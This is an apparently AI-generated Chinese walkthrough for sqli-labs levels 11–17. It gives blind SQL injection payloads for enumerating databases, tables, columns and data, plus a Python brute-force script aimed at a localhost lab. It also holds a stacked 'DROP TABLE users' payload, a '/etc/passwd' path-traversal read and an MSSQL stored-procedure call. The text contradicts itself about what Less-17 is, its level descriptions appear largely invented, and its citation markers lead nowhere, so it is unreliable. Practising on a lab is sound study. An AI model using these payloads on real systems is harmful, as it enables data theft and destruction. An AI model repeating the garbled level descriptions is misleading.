sqli-labs less17

### SQL注入实验室（sqli-labs）Less-17 解法或提示 在 SQL 注入实验室（sqli-labs）中，Less-17 是一个基于布尔盲注的 SQL 注入关卡。此关卡的目标是通过布尔盲注技术逐步推断出数据库中的信息[^1]。布尔盲注的核心思想是利用条件判断来确定查询结果是否满足特定条件，从而推导出目标数据。 以下是关于 Less-17 的解法提示： #### 1. 确定数据库名 可以通过以下 Payload 来逐字猜测数据库名： ```python 1' AND IF(ASCII(SUBSTRING((SELECT database()),X,1))=Y,sleep(1),1) -- a ``` 其中： - `X` 表示当前猜测的字符位置。 - `Y` 表示当前猜测的 ASCII 值。 通过不断调整 `X` 和 `Y` 的值，可以逐步推断出完整的数据库名[^1]。 #### 2. 获取表名 在确定数据库名后，可以使用类似的方法获取该数据库中的表名。Payload 示例如下： ```python 1' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema='数据库名' LIMIT X,1),Y,1))=Z,sleep(1),1) -- a ``` 其中： - `数据库名` 是上一步中推断出的数据库名称。 - `X` 表示当前表的索引。 - `Y` 表示当前猜测的字符位置。 - `Z` 表示当前猜测的 ASCII 值。 通过不断调整参数，可以枚举出所有表名[^4]。 #### 3. 获取列名 在确定表名后，可以进一步获取表中的列名。Payload 示例如下： ```python 1' AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='表名' LIMIT X,1),Y,1))=Z,sleep(1),1) -- a ``` 其中： - `表名` 是上一步中推断出的表名称。 - 其他参数含义与上一步相同。 通过不断调整参数，可以枚举出所有列名[^3]。 #### 4. 获取数据内容 在确定列名后，可以提取表中的具体数据。Payload 示例如下： ```python 1' AND IF(ASCII(SUBSTRING((SELECT 列名 FROM 表名 LIMIT X,1),Y,1))=Z,sleep(1),1) -- a ``` 其中： - `列名` 是上一步中推断出的列名称。 - 其他参数含义与上一步相同。 通过不断调整参数，可以提取出表中的所有数据[^1]。 #### 注意事项 - 在实际测试中，可能需要根据目标环境调整 Payload，例如替换 `sleep(1)` 为其他延迟函数。 - 如果目标环境不支持时间盲注，可以尝试使用布尔盲注结合页面回显来判断条件是否成立。 - 测试时请确保遵守相关法律法规，仅在授权范围内进行实验。 ```python # 示例代码：自动化脚本框架 import requests url = "http://127.0.0.1/sqli-labs/Less-17/" true_condition = "正确响应标志" # 替换为实际页面的正确响应标志 def check_payload(payload): response = requests.get(url, params={"id": payload}) return true_condition in response.text def guess_char(position, ascii_value): payload = f"1' AND IF(ASCII(SUBSTRING((SELECT database()),{position},1))={ascii_value},1,0) -- a" return check_payload(payload) # 自动化猜解逻辑 database_name = "" for i in range(1, 20): # 假设数据库名长度不超过20 for j in range(32, 127): # ASCII 可见字符范围 if guess_char(i, j): database_name += chr(j) print(f"当前数据库名: {database_name}") break ```

### 关于 sqli-labs 中 less-11 到 less-17 的解决方案和解释 #### Less-11: 基本布尔盲注 SQL 注入漏洞 此级别展示了如何通过布尔条件来推断数据库中的数据。攻击者可以通过发送不同的查询并观察应用程序响应的变化来进行注入。 ```sql ?id=1' AND ASCII(SUBSTRING((SELECT database()),1,1))>90 -- ``` 上述语句尝试猜测当前使用的数据库名称的第一个字符的ASCII码值是否大于90[^1]。 #### Less-12: 时间延迟型盲注 SQL 注入漏洞 该实验利用时间函数 `SLEEP()` 或 `BENCHMARK()` 来判断服务器执行特定操作所需的时间，从而推测出某些信息。 ```sql ?id=1' AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 1),1,1))>97,SLEEP(5),false) -- ``` 这段代码会根据指定条件下是否成立而使请求暂停几秒钟，以此作为反馈机制[^2]。 #### Less-13: 联合查询 (UNION) SQL 注入漏洞 联合查询允许将两个或多个 SELECT 结果组合在一起显示给用户。在这个例子中，可以用来获取额外的数据集。 ```sql ?id=-1 UNION ALL SELECT null,database(),null,null -- ``` 这里 `-1` 是为了确保原始查询返回零行记录，以便新添加的选择能够成功附加到最终输出上[^3]。 #### Less-14: 双重查询（堆叠查询）SQL 注入漏洞 当 Web 应用程序支持在同一 HTTP 请求内处理多条命令时，则可能存在这种类型的漏洞。这使得攻击者可以在一次提交里完成多项任务。 ```sql ?id=1; DROP TABLE users; ``` 注意，在实际环境中很少遇到这种情况，因为大多数现代框架都会阻止此类行为的发生[^4]。 #### Less-15: 错误消息泄露敏感信息 有时开发人员会在错误页面暴露过多细节，比如完整的 SQL 查询字符串甚至栈跟踪等内部实现情况。这些都可能帮助黑客构建更复杂的攻击模式。 ```sql ?id=' OR '1'='1 ``` 如果网站未正确配置异常处理器的话，可能会显示出整个 SQL 表达式的结构，进而让入侵者更容易找到突破口[^5]。 #### Less-16: 文件读取/写入权限滥用 一些情况下，Web 应用程序允许上传文件或将动态生成的内容保存至磁盘；然而如果没有严格验证输入参数就可能导致任意位置上的文档被篡改或者下载下来查看其内容。 ```sql ?file=/etc/passwd%00.jpg ``` 这里的技巧在于绕过 MIME 类型检测以及路径规范化逻辑，达到访问受限资源的目的[^6]。 #### Less-17: 存储过程调用与预编译语句绕过 存储过程中往往包含了大量业务逻辑，并且通常由高级程序员编写维护。但是假如它们也接收外部可控变量的话同样面临风险。此外，对于那些声称已经启用了防备措施的应用来说，仍然有可能存在旁路方法。 ```sql CALL sp_executesql(N'SELECT * FROM sysobjects') ``` 尽管许多平台默认不允许直接执行这样的指令，但在某些特殊场景下还是有机会成功的[^7]。